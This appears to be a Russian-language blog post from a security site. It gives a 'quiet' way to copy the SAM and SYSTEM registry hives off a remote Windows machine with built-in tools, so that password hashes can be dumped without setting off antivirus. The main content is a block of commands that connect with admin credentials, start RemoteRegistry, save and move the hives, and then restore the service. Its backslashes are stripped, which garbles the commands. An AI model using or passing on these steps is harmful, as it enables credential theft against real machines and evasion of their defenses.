[hacking tricks] Тихий pwdump

3785
[hacking tricks] Тихий pwdump
Каждый раз, когда необходимо выдрать локальную базу SAM с компутера под управлением окон, у тулов серии pwdump начинается истерика в предвестии реакции используемого авера на удаленной машине(( И этот процесс все чаще начинает походить на танцы с бубном вокруг когда-то девственного софта, не побывавшего в лаборатории дяди ммм... вирусного аналитика) Поэтому, дабы сэкономить время и нервы (юзверей) приходится отказываться от стороннего ПО и прибегать к использованию встроенных средств операционной системы :)

Про скрытые копии я уже говорил ранее. Этот способ отлично подходит для перетягивания содержимого адешечки. А вот для локальной базы SAM существуют и другие не менее простые варианты. Один из них представлен ниже.

C:WindowsSystem32>

net use RHOSTc$ /u:admin password
sc RHOST config RemoteRegistry start= demand
sc RHOST start RemoteRegistry
reg save RHOSThklmsam sam
reg save RHOSThklmsystem system
move RHOSTC$WindowsSystem32sam sam
move RHOSTC$WindowsSystem32system system
sc RHOST stop RemoteRegistry
sc RHOST config RemoteRegistry start= disabled
net use RHOSTc$ /del

После чего соответствующие файлы передаются понимающим их гуям [ например].

Alt text
Обращаем внимание, что все материалы в этом блоге представляют личное мнение их авторов. Редакция SecurityLab.ru не несет ответственности за точность, полноту и достоверность опубликованных данных. Вся информация предоставлена «как есть» и может не соответствовать официальной позиции компании.
рассекречено
Антипов жжёт
ПЛАТОН СОВРАЛ. ОБЩЕСТВО ВЫЖИЛО
Сапольски пишет бестселлер. Харрис ведёт подкаст. Правда о детерминизме валяется на каждой полке. Бунта не случилось. Только подкастеры стали добрее.
благородная
ложь
сдохла
дело № V-1983